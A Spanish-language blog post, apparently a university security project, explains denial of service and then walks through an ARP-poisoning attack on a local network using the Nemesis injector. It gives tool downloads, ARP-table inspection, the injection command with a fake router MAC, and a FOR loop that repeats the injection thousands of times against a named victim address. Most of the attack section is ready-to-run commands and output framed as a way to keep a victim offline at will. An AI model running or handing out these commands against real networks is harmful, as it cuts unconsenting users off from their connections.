Inicio > Informatica > Ataque de Denegacion de Servicio (DOS)

Ataque de Denegacion de Servicio (DOS)

ATAQUE DE DENEGACIÓN DE SERVICIO (DOS)

A continuacion presentaremos un proyecto universitario en seguridad informática, un ataque de denegación de servicio, también llamado ataque DOS (de las siglas en inglés Denial of Service), es un ataque a un sistema de ordenadores o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos o sea que deniegue el acceso al recurso solicitado. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima.
Se genera mediante la saturación de los puertos con flujo de información sea paquetes ICMP, o TCP, haciendo que el servidor se sobrecargue y no pueda seguir prestando servicios, por eso se le dice “denegación”, pues hace que el servidor no de abasto a la cantidad de usuarios. Esta técnica es usada por los llamados crackers para dejar fuera de servicio a servidores objetivo.

INYECTOR DE PAQUETES ARP AUTOMATICO (DOS)

El Ataque que se presenta a continuacion será un D.O.S. en una Red Local (LAN), Envenenaremos las Tablas ARP de un Ordenador a través de ARP Injection, en el Paquete que inyectaremos arbitrariamente, cambiaremos la dirección MAC del Router por una inexistente, por lo que la máquina víctima fracasará en el intento de encontrarla, con esto conseguiremos que el Ordenador de nuestra víctima se quede sin Internet (Sin acceso al servicio) por el tiempo que nosotros queramos.

Para que esto funcione necesitaremos las siguientes herramientas adjuntas en links:
1.Instalar el winpcap 3.0 Descargar Winpcap 3.0
2.Némesis (el inyector de paquetes) Descargar Nemesis
3.libnetNT.dll (librería necesaria para que Némesis) Descargar LibnetNT

Nota: Al descargar los archivos saldran con extension .odt al momento de guardarlos deben de reemplazar la extension por .zip. La librería LibnetNT.dll debe estar Obligatoriamente en el Directorio donde se encuentre Némesis.
Abrimos una consola DOS, menú inicio, luego ejecutar y digitamos cmd. Ahora nos dirigirnos hacia el Directorio donde se encuentra Némesis (C:\cd Némesis), una vez ahí escribimos:

C:\Némesis\>nemesis.exe

Esto nos mostrará la sintaxis del programa y los Comandos posibles, a nosotros nos interesa “ARP”, bien, para ver la ayuda escribamos:

C:\Némesis\>nemesis.exe arp help

Y nos mostrará la Sintaxis y los modos de Inyección de paquetes, A continuación empezaremos el ataque, primero que nada debemos saber la Dirección mac del Router de la red, para eso escribamos en nuestra ventana DOS el siguiente comando:

C:\>arp -a
Interfaz: 192.168.0.25 —0x2
Dirección IP Dirección Física Tipo
192.168.0.1 00-09-45-e3-6f-31 Dinámico <<Atención Aquí

Esto nos mostrará nuestra tabla caché de ARP, en ella se encuentra la asociación de la Dirección IP del Router con su MAC, bien, He subrayado el tipo de la asociación porque ahí se encuentra la vulnerabilidad a éste ataque, aparece como “Dinámico” lo que significa que en un lapso de tiempo se actualizará, es decir, que la podemos cambiar a nuestro antojo, ya que sabemos nuestras direcciones.
Ahora necesitamos saber la Dirección MAC de la Víctima, pero no aparece en nuestra Tabla ARP, para que aparezca debemos hacerle un ping a la víctima ya sea con la direccion Ip o por su direccion ( Ejemplo:www.cisc.ug.edu.ec), para eso hagamos lo siguiente:

C:\>Ping IPVICTIMA

Se deberá haberse actualizado con la dirección IP y MAC de nuestra víctima, Veamos:

C:\>arp -a

Interfaz: 192.168.0.25 —0x2
Dirección IP Dirección Física Tipo
192.168.0.1 00-09-45-e3-6f-31 Dinámico
182.168.0.50 01-F4-65-83-09-51 Dinámico

Como ya sabemos las direcciones necesarias la ip de nuestra victima, ahora podemos realizar el ataque, para eso escribamos el siguiente comando desde el directorio de nuestro Inyector ARP, Némesis:

C:\Némesis\>nemesis arp -D IP.Víctima -S IP.Router -H Fake.MAC.Router

En nuestra practica:

C:\Némesis\>nemesis arp -D 192.168.0.50 -S 192.168.0.1 -H 00:01:02:03:04:05
ARP Packet Injected

Con esto le diremos a la Tabla de (IP.Víctima) que la dirección IP (IP.Router) pertenece a la dirección MAC (Fake.Mac.Router), es decir, le estamos indicando que la Dirección MAC de su router es una inexistente, por lo que no lo encontrará y perderá el servicio de Internet momentáneamente.
Esta denegación momentánea sucede porque la Inyección de ARP no es constante, simplemente inyectamos un paquete con este proceso. Para hacer una Inyección Constante de ARP, necesitaremos hacer un Bucle, para ello digitamos el siguiente comando:

C:\Némesis\>FOR /L %i IN (1,1,6500) DO nemesis arp -D 192.168.0.50 -S 192.168.0.1 –H 00:01:02:03:04:05

Con esto conseguimos que Némesis se mantenga constantemente Inyectando Paquetes maliciosos en la Víctima mediante el for, hasta que acabe el Bucle, lo que provocara que el acceso hacia nuestra victima tarde en responder por las multiples peticiones a ella que se ejecuta con este proceso y sea denegada lo que provoca que deniegue el servicio.
About these ads
Categorías:Informatica
  1. Aún no hay comentarios.
  1. No trackbacks yet.

Deja un comentario

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

%d personas les gusta esto: